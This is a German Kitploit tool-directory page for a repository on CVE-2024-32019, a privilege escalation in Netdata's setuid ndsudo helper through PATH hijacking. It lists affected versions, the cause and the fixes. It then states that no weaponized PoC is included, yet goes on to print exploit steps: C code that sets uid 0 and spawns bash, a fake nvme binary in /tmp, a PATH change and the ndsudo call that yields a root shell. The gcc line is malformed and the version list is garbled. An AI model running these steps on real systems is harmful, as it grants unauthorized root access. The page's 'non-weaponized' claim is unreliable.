Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2024-32019-PoC — Prüft die Netdata ndsudo SUID PATH Privilegieneskalations-Exposition für CVE-2024-32019 und validiert Patches ohne weaponisierte Ausnutzung. | Kitploit
Tools/GitHubGitHub/ayub0x7/cve-2024-32019-poc
DefensivwerkzeugePrivilege EscalationSchwachstellenanalyseExploitationSicherheitsvirtualisierungPenetrationstests
GitHubayub0x7/cve-2024-32019-poc

cve-2024-32019-PoC

Prüft die Netdata ndsudo SUID PATH Privilegieneskalations-Exposition für CVE-2024-32019 und validiert Patches ohne weaponisierte Ausnutzung.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-32019 — Netdata ndsudo Lokale Privilegienausweitung

Zusammenfassung

Netdadas ndsudo-Helfer (installiert als setuid root) schränkt ein, welche Befehle er ausführt, aber löst diese Befehle über den PATH des Aufrufers auf. In betroffenen Versionen kann ein lokaler Benutzer eine bösartige Binärdatei früher im PATH platzieren und ndsudo dazu bringen, sie mit Root-Rechten auszuführen. Behoben in Netdata 1.45.3 und 1.45.0-169.

Betroffen / Behoben

  • Betroffen: >= 1.44.0-60, < 1.45.0-169 und (gemäß Upstream-Advisory).

>= 1.45.0, < 1.45.3
  • Behoben: 1.45.3 (stable), 1.45.0-169 (nightly). GitHub

  • Auswirkung

    Lokale Privilegienausweitung zu Root auf Systemen, auf denen ndsudo mit SUID installiert ist und der Benutzer es aufrufen kann (üblicherweise Mitglieder der Gruppe netdata). NVDGitHub

    Ursache (auf hoher Ebene)

    • ndsudo ist SUID-root und führt eine Whitelist von Unterbefehlen wie nvme-list, nvme-smart-log usw.

    • Es ruft externe ausführbare Dateien über ihren Namen auf (z. B. nvme), die über PATH aufgelöst werden, anstatt absolute Pfade oder eine sichere, feste Suche zu verwenden.

    • Wenn ein beschreibbares Verzeichnis vor den Systempfaden erscheint, kann ein Angreifer eine täuschend ähnliche Binärdatei einschleusen, die als Root ausgeführt wird. GitHub

    Sichere Reproduktion / Verifikation

    Dieses Repository enthält Nicht-Exploit-Prüfwerkzeuge, die:

    • /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (oder wo auch immer installiert) auf SUID/Eigentümerschaft untersuchen.

    • PATH nach beschreibbaren Verzeichnissen durchsuchen, die vor gängigen Systempfaden liegen.

    • Das Vorhandensein von Whitelist-Unterbefehlsnamen bestätigen, die ndsudo auszuführen versuchen könnte.

    • Optional ndsudo --test <subcommand> ausführen, um den aufgelösten Befehl ohne dessen Ausführung auszugeben (mit Vorsicht verwenden, zuerst den Code lesen). GitHub

    ⚠️ Es ist kein weaponisierter PoC enthalten. Dieses Projekt dient Verteidigern und Forschern dazu, Exposition zu bewerten und Patches verantwortungsvoll zu validieren.

    Gegenmaßnahmen

    • Aktualisieren Sie Netdata auf 1.45.3 (stable) oder 1.45.0-169 (nightly).

    • Als Defense-in-Depth-Maßnahme bevorzugen Sie absolute Pfade oder einen bereinigten minimalen PATH in SUID-Helfern; vermeiden Sie unnötigen ndsudo-Zugriff. GitHubwiz.io

    Exploit-Schritte

    1. Speichern Sie den folgenden C-Code als nvme.c:
    root@kitploit:~
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    
    int main() {
        setuid(0);
        setgid(0);
        execl("/bin/bash", "bash", NULL);
        return 0;
    }
    
    2. Kompilieren Sie den Exploit
    root@kitploit:~
    gcc nvme.c - nvme
    
    3. Umgebung einrichten
    root@kitploit:~
    mkdir -p /tmp/fakebin
    mv nvme /tmp/fakebin/
    chmod +x /tmp/fakebin/nvme
    
    4. Ändern Sie den PATH
    root@kitploit:~
    export PATH=/tmp/fakebin:$PATH
    
    5. Exploit-Befehl
    root@kitploit:~
    /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
    

    Referenzen

    • NVD: CVE-2024-32019. NVD

    • Netdata Advisory (GHSA-pmhq-4cxq-wj93). GitHub

    • Wiz-Zusammenfassung. wiz.io

    • Snyk-Bericht. Vulnerability Guide

    • MITRE/CVE-Eintrag. CVE

    Tool herunterladen